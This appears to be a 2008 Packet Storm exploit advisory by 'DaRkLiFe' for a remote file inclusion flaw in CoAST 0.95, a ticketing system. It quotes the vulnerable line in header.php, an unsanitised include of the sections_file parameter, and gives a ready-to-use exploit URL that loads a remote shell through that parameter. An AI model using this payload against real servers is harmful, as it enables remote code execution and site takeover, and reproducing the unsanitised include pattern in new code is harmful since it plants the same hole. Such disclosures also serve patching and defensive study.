coast-rfi.txt

2008-09-28T00:00:00
ID PACKETSTORM:70419
Type packetstorm
Reporter DaRkLiFe
Modified 2008-09-28T00:00:00

Description

                                        
                                            `**************************************************************************************  
  
Author : By DaRkLiFe  
Greetz : str0ke & S.VV.A.T.  
  
**************************************************************************************  
Script : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability  
  
Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0  
  
**************************************************************************************  
  
Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz?  
  
  
**************************************************************************************  
  
The header.php.dist file exists and it has to be renamed into header.php as given in instructions.  
  
Vulberable : line 201 : <?php @include $sections_file; ?>  
  
**************************************************************************************  
  
THANKS ! GREETZ !   
*******************************  
`